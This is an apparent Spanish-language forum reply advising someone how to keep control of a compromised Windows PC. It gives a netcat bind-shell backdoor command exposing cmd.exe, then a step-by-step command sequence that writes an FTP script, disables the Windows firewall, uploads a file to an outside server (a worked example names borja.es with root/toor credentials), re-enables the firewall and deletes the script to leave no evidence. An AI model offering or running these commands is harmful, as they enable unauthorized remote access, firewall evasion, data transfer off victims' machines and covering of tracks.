Lo normal es instalar una backdoor con netcat por ejemplo insertandole el comando "nc -v -l -p 3377 -e cmd.exe" o con cualquier programa similar que tú mismo puedas crear y deje una aplicacion como la linea de comandos a la escucha.
Lo malo es que tan solo podrás conectarte vía local network a no ser que abras los puertos de su router, pero para ello necesitas conocer el modelo y tal. Espero haberte ayudado. Si tienes alguna pregunta citame.

Es complicado no pasar ficheros por FTP ya que es el protocolo de transmisión de ficheros, además una backdoors como NC no se suele usar para transferir ficheros, sino para tener un control sobre el PC dominado. Si el problema es el firewall o algo, yo lo que hago si quiero enviarme algún fichero a un ordenador al que le he instalado la backdoor es:
C:\>echo (usuario)>> envioFTP.txt
C:\>echo (contraseña)>>envioFTP.txt
C:\>echo put (archivo que quieres enviar)>>envioFTP.txt
C:\>echo exit>>envioFTP.txt
C:\>netsh set firewall opmode disable (desactiva el firewall de windows)
C:\>ftp -s:envioFTP.txt (y aqui tu servidor FTP)
C:\>netsh set firewal opmode enable (activa el firewall de windows)
C:\>del envioFTP.txt (para no dejar evidencias)

Creo que con este ejemplo queda bastante claro como funciona. Aplico el ejemplo:

C:\>echo root>> envioFTP.txt
C:\>echo toor>>envioFTP.txt
C:\>echo put programa.exe>>envioFTP.txt
C:\>echo exit>>envioFTP.txt
C:\>netsh set firewall opmode disable
C:\>ftp -s:envioFTP.txt borja.es
C:\>netsh set firewal opmode enable
C:\> del envioFTP.txt

Espero haberte ayudado.